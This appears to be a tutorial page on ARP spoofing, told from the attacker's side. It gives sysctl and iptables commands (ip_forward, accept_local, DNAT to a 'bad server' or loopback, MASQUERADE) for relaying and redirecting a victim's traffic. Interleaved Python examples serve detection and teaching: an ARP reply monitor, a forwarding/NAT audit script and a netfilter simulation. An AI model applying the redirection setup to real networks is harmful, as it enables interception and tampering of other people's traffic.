
ARP spoofing configuration


ARP spoofing is a technique that allows an attacker to redirect the traffic of an unsuspecting client to a machine of his choice.
It relies on the Address Resolution Protocol (ARP), which lets a machine discover the MAC address of another machine given its IP address.

[Diagram: a client broadcasts an ARP request for an IP address and the machine that owns it replies with its MAC address]

If a bad actor is allowed to reply to an ARP request he has no business replying to, he can redirect the traffic of the client to a machine of his choice, including his own.
This is because he can make the client believe that the MAC address of the machine with the IP address he is looking for is the one the attacker puts in the ARP reply.

[Diagram: the attacker answers the client's ARP request with his own MAC address, so the client sends its traffic to the attacker]
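The observable symptoms of the spoofing just described are a reply nobody asked for and a reply that changes an IP-to-MAC binding the network has already learned. The following is an added example, not code from the original page: it parses raw Ethernet/IPv4 ARP payloads (28-byte layout per RFC 826), keeps a table of bindings learned from replies, and reports both symptoms. The MAC addresses and the traffic sequence are constructed for the example; the IP addresses follow the page's 10.0.0.0/24 examples.

```python
# Added example (not from the original page): parse raw ARP payloads and flag
# the two symptoms of the spoofing described above: a reply nobody asked for,
# and a reply that changes an IP-to-MAC binding already learned for that IP.
import struct

ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Build a 28-byte Ethernet/IPv4 ARP payload (field layout per RFC 826)."""
    header = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)  # htype, ptype, hlen, plen, oper
    return (header + mac_bytes(sender_mac) + ip_bytes(sender_ip)
            + mac_bytes(target_mac) + ip_bytes(target_ip))


def parse_arp(payload):
    """Parse an Ethernet/IPv4 ARP payload into a dict; reject anything else."""
    if len(payload) < 28:
        raise ValueError("ARP payload too short")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", payload[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", payload[8:28])
    return {"op": op, "sender_mac": mac_str(sha), "sender_ip": ip_str(spa),
            "target_mac": mac_str(tha), "target_ip": ip_str(tpa)}


class ArpWatch:
    """Passive monitor: learn bindings from replies and report suspicious ones."""

    def __init__(self):
        self.bindings = {}    # ip -> mac learned from the first reply seen
        self.pending = set()  # (requester_ip, wanted_ip) for unanswered requests
        self.alerts = []

    def observe(self, payload):
        pkt = parse_arp(payload)
        found = []
        if pkt["op"] == ARP_REQUEST:
            self.pending.add((pkt["sender_ip"], pkt["target_ip"]))
            return found
        if pkt["op"] != ARP_REPLY:
            return found
        ip, mac, to_ip = pkt["sender_ip"], pkt["sender_mac"], pkt["target_ip"]
        if (to_ip, ip) in self.pending:
            self.pending.discard((to_ip, ip))
        elif ip != to_ip:  # gratuitous ARP (sender == target) announces itself; skip it
            found.append(f"unsolicited ARP reply for {ip} sent to {to_ip} from {mac}")
        known = self.bindings.setdefault(ip, mac)
        if known != mac:
            found.append(f"binding for {ip} changed from {known} to {mac}")
        self.alerts.extend(found)
        return found


# Constructed sample traffic: the client asks for the server at 10.0.0.3, gets a
# legitimate reply, then receives a second, unsolicited reply for the same IP
# from a different MAC. The MAC addresses are made up for the example.
CLIENT_MAC, CLIENT_IP = "02:00:00:00:00:02", "10.0.0.2"
SERVER_MAC, SERVER_IP = "02:00:00:00:00:03", "10.0.0.3"
OTHER_MAC = "02:00:00:00:00:04"
ZERO_MAC = "00:00:00:00:00:00"


def demo():
    watch = ArpWatch()
    frames = [
        build_arp(ARP_REQUEST, CLIENT_MAC, CLIENT_IP, ZERO_MAC, SERVER_IP),
        build_arp(ARP_REPLY, SERVER_MAC, SERVER_IP, CLIENT_MAC, CLIENT_IP),
        build_arp(ARP_REPLY, OTHER_MAC, SERVER_IP, CLIENT_MAC, CLIENT_IP),
    ]
    for frame in frames:
        for alert in watch.observe(frame):
            print(alert)
    return watch.alerts


if __name__ == "__main__":
    demo()
```

On a real network the payloads would come from a raw socket or a capture file, and a binding change is not proof of an attack by itself: DHCP reassignments and failover setups also move an IP between MACs, so the second alert is best correlated with the first and with the DHCP lease log.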

Capitalizing on the attack

Once the attacker has redirected the traffic of the client to his own machine, he can do whatever he wants with it.

Packet forwarding

By default, a Linux machine does not forward packets that are not addressed to it (the kernel's ip_forward setting is 0), so the attacker has to enable forwarding before the redirected traffic can be passed on to wherever he sees fit.

echo 1 > /proc/sys/net/ipv4/ip_forward # enable packet forwarding temporarily
# or
sysctl -w net.ipv4.ip_forward=1 # enable packet forwarding temporarily

To make this configuration permanent, edit /etc/sysctl.conf and set net.ipv4.ip_forward=1 (uncommenting the line if it is present but commented out), then reboot the machine.

# /etc/sysctl.conf
# ...
net.ipv4.ip_forward=1
# ...

Iptables routing

The attacker can use iptables to redirect the traffic to a specific port of his machine.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

More often than not, though, the goal of the attacker is to redirect it to a different machine, like so.

# The tcp traffic directed to the good server 10.0.0.3 port 80 is captured by the attacker
# and sent to the bad server 10.0.0.4 port 8080
iptables -t nat -A PREROUTING -p tcp -d 10.0.0.3 --destination-port 80 -j DNAT --to-destination 10.0.0.4:8080

# To make sure the bad server is able to reply to the client, the attacker has to masquerade the traffic
# This command masquerades the tcp traffic directed to the bad server 10.0.0.4 port 8080
# making it look like it comes from the attacker's machine
# the response is then sent back to the client
iptables -t nat -A POSTROUTING -p tcp -d 10.0.0.4 --dport 8080 -j MASQUERADE

Enabling localhost

If the attacker wants to redirect the traffic to a service running on his own machine, he could simply use the machine's IP address.
But he may also want to use the loopback address, to redirect the client to a service that can only be accessed by the machine itself and is not visible from the network.
To do so, he has to enable so-called alien addresses for the loopback address.

echo 1 > /proc/sys/net/ipv4/conf/all/accept_local # enable alien addresses temporarily
# or
sysctl -w net.ipv4.conf.all.accept_local=1 # enable alien addresses temporarily

For a permanent configuration, edit /etc/sysctl.conf and set net.ipv4.conf.all.accept_local=1 (uncommenting the line if it is present but commented out), then reboot the machine.

# /etc/sysctl.conf
# ...
net.ipv4.conf.all.accept_local=1
# ...

With this enabled, the iptables rule seen before becomes

# All the tcp traffic to the good server is redirected to the loopback address of the attacker's machine
iptables -t nat -A PREROUTING -p tcp -d 10.0.0.3 --destination-port 80 -j DNAT --to-destination 127.0.0.1
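Every setting in the packet-forwarding, iptables and loopback sections above leaves a trace in `sysctl -a` and `iptables-save` output, which makes them easy to audit on a host that should not be relaying or rewriting traffic. The following audit script is an added example, not code from the original page. It takes the text of those two commands, parses the sysctl key/value lines and the nat table rules, and reports forwarding or NAT configuration. The sample inputs are constructed and mirror the page's rules; the script also checks `net.ipv4.conf.all.route_localnet`, which is the kernel's documented setting for routing to 127/8 and is worth checking alongside the page's `accept_local`.

```python
# Added example (not from the original page): audit a Linux host for the
# settings the page describes, given the text of `sysctl -a` and `iptables-save`.
# The sample inputs below are constructed and mirror the page's rules.
import re

# sysctl keys worth flagging on a host that should not forward or NAT traffic.
# accept_local is the key the page uses; route_localnet is the kernel's own
# knob for routing to 127/8, so an audit should check both.
SYSCTL_FLAGS = {
    "net.ipv4.ip_forward": "forwards packets not addressed to it",
    "net.ipv4.conf.all.accept_local": "accepts packets with local source addresses",
    "net.ipv4.conf.all.route_localnet": "routes traffic to loopback addresses",
}
NAT_TARGETS = {"DNAT", "SNAT", "REDIRECT", "MASQUERADE"}


def parse_sysctl(text):
    """Turn `key = value` lines (sysctl -a format) into a dict."""
    settings = {}
    for line in text.splitlines():
        m = re.match(r"\s*([\w.]+)\s*=\s*(\S+)", line)
        if m:
            settings[m.group(1)] = m.group(2)
    return settings


def parse_nat_rules(text):
    """Return the `-A ...` rules of the nat table from iptables-save output."""
    rules, table = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("*"):
            table = line[1:]
        elif line == "COMMIT":
            table = None
        elif table == "nat" and line.startswith("-A "):
            rules.append(line)
    return rules


def audit(sysctl_text, iptables_text):
    """List the forwarding/NAT findings; an empty list means nothing flagged."""
    findings = []
    settings = parse_sysctl(sysctl_text)
    for key, meaning in SYSCTL_FLAGS.items():
        if settings.get(key) == "1":
            findings.append(f"{key}=1: host {meaning}")
    for rule in parse_nat_rules(iptables_text):
        m = re.search(r"-j\s+(\w+)", rule)
        if m and m.group(1) in NAT_TARGETS:
            chain = rule.split()[1]
            findings.append(f"nat/{chain} {m.group(1)} rule: {rule}")
    return findings


# Constructed sample output, in the format of `sysctl -a` and `iptables-save`.
SAMPLE_SYSCTL = """\
net.ipv4.ip_forward = 1
net.ipv4.conf.all.accept_local = 1
net.ipv4.conf.all.route_localnet = 0
net.ipv4.conf.all.rp_filter = 1
"""

SAMPLE_IPTABLES = """\
*filter
:INPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
COMMIT
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -d 10.0.0.3/32 -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.0.0.4:8080
-A POSTROUTING -d 10.0.0.4/32 -p tcp -m tcp --dport 8080 -j MASQUERADE
COMMIT
"""


def demo():
    findings = audit(SAMPLE_SYSCTL, SAMPLE_IPTABLES)
    for finding in findings:
        print(finding)
    return findings


if __name__ == "__main__":
    demo()
```

On a real host, feed it the output of `sysctl -a` and `iptables-save` (or `iptables-save -t nat`, which the parser handles the same way). Routers and container hosts legitimately have ip_forward=1 and MASQUERADE rules, so the findings are a baseline to compare against, not a verdict.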

What happens to the packets

The packets are processed by the machine in the following order.

[Diagram not rendered: a packet passes through PREROUTING, then the routing decision, then INPUT (local delivery) or FORWARD, then POSTROUTING on the way out]

What we do with iptables is to alter the packets in the PREROUTING chain, before the routing decision is made, and in the POSTROUTING chain.

In the PREROUTING chain, we can alter the destination address of the packet, so that it is routed to a different machine.

In the POSTROUTING chain, we masquerade the packet. This means that we alter the source address of the packet, so that it appears as if it came from the attacker’s machine. Once the response has been sent back to the attacker’s machine, the latter will remember the original sender, the client, and forward the response to it.
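The sequence just described, as an added worked model that is not the kernel's code and not from the original page: a tiny simulation of a host with a PREROUTING DNAT rule, a routing decision, a POSTROUTING MASQUERADE rule and a connection-tracking table. It traces one client packet through the two-rule setup and through the loopback variant, and then runs the server's reply back through the table, which restores both the masqueraded source and the original destination, so the client sees the answer come from 10.0.0.3:80. The relay's own address 10.0.0.1 and the client's source port 40000 are assumed values; the page gives neither, and a real MASQUERADE may also rewrite the source port.

```python
# Added example (not the kernel's code): a toy model of the netfilter path the
# page describes, showing how a PREROUTING DNAT rule, the routing decision, a
# POSTROUTING MASQUERADE rule and the connection-tracking table act on one
# client packet and on the server's reply. The relay's own address 10.0.0.1
# and the client's port 40000 are assumed; the page gives neither.
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int


class NatHost:
    def __init__(self, own_ip, dnat, masquerade):
        self.own_ip = own_ip
        self.dnat = dnat              # {(dst, dport): (new_dst, new_dport)}
        self.masquerade = masquerade  # {(dst, dport)} that trigger MASQUERADE
        self.conntrack = {}           # reply 4-tuple -> original client packet
        self.trace = []

    def prerouting(self, pkt):
        """nat/PREROUTING: rewrite the destination before the routing decision."""
        if (pkt.dst, pkt.dport) in self.dnat:
            new_dst, new_dport = self.dnat[(pkt.dst, pkt.dport)]
            self.trace.append(f"PREROUTING: DNAT {pkt.dst}:{pkt.dport} -> {new_dst}:{new_dport}")
            pkt = replace(pkt, dst=new_dst, dport=new_dport)
        return pkt

    def routing_decision(self, pkt):
        local = pkt.dst in (self.own_ip, "127.0.0.1")
        self.trace.append("routing decision: " + ("INPUT (local service)" if local else "FORWARD"))
        return "INPUT" if local else "FORWARD"

    def postrouting(self, pkt, original):
        """nat/POSTROUTING: masquerade and remember how to undo it for the reply."""
        if (pkt.dst, pkt.dport) in self.masquerade:
            pkt = replace(pkt, src=self.own_ip)  # a real MASQUERADE may also change sport
            self.conntrack[(pkt.dst, pkt.dport, pkt.src, pkt.sport)] = original
            self.trace.append(f"POSTROUTING: MASQUERADE source -> {self.own_ip}:{pkt.sport}")
        return pkt

    def inbound(self, pkt):
        """Process a packet from the client; return what leaves or is delivered locally."""
        original = pkt
        pkt = self.prerouting(pkt)
        if self.routing_decision(pkt) == "FORWARD":
            pkt = self.postrouting(pkt, original)
        return pkt

    def reply(self, pkt):
        """Process the server's reply: conntrack reverses both translations."""
        original = self.conntrack.get((pkt.src, pkt.sport, pkt.dst, pkt.dport))
        if original is None:
            return None  # no tracked connection: nothing to forward
        self.trace.append(f"reply: restored {original.dst}:{original.dport} -> {original.src}:{original.sport}")
        return Packet(original.dst, original.dport, original.src, original.sport)


def demo_forward():
    """The two-rule setup: DNAT to 10.0.0.4:8080, MASQUERADE on the way out."""
    host = NatHost("10.0.0.1", {("10.0.0.3", 80): ("10.0.0.4", 8080)}, {("10.0.0.4", 8080)})
    out = host.inbound(Packet("10.0.0.2", 40000, "10.0.0.3", 80))
    back = host.reply(Packet("10.0.0.4", 8080, out.src, out.sport))
    return out, back, host.trace


def demo_loopback():
    """The loopback variant: DNAT to 127.0.0.1 ends in INPUT, so no MASQUERADE is needed."""
    host = NatHost("10.0.0.1", {("10.0.0.3", 80): ("127.0.0.1", 80)}, set())
    out = host.inbound(Packet("10.0.0.2", 40000, "10.0.0.3", 80))
    return out, host.trace


if __name__ == "__main__":
    for line in demo_forward()[2] + demo_loopback()[1]:
        print(line)
```

The conntrack entry is keyed on the reply's 4-tuple, which is why a reply with no matching entry is dropped rather than forwarded anywhere: that is the same behaviour that makes the MASQUERADE rule necessary in the first place, since without it the server would answer the client directly and the client would discard a reply from an address it never contacted.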